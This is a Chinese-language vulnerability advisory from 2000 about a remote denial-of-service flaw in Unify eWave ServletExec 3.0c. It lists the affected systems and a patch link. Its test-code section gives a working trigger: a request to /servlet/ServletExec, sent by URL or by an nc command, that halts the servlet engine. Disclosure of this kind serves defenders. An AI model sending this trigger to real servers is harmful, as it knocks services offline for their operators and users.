Unify eWave ServletExec拒绝服务攻击

发布时间：2000-11-01
更新时间：2000-11-01
严重程度：中
威胁程度：远程拒绝服务
错误类型：设计错误
利用方式：服务器模式

受影响系统

Unify eWave ServletExec 3.0c
   - Sun Solaris 8.0
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
   - Linux kernel 2.3.x
   - IBM AIX 4.3.2
   - HP HP-UX 11.4

详细描述
Unify eWave ServletExec是一个用于多个主要WEB服务器的JAVA/JAVA SERVLET
引擎的PLUG-IN，

EWAVE ServletExec存在缓冲溢出，如果一URL通过/servlet请求来调用ServletExec的时候产生。ServletExec引擎会尝试在端口80上绑定一服务线程，如果WEB服务程序正在运行的话，一java.net.BindException错误就会产生，并停止
所有ServletExec引擎的操作。

测试代码
http://target/servlet/ServletExec

或者

nc 10.0.0.1 80
GET /servlet/ServletExec HTTP/1.0

解决方案
请下载补丁：

http://www.servletexec.com/downloads/

相关信息

最近严重漏洞

Unify eWave ServletExec拒绝服务攻击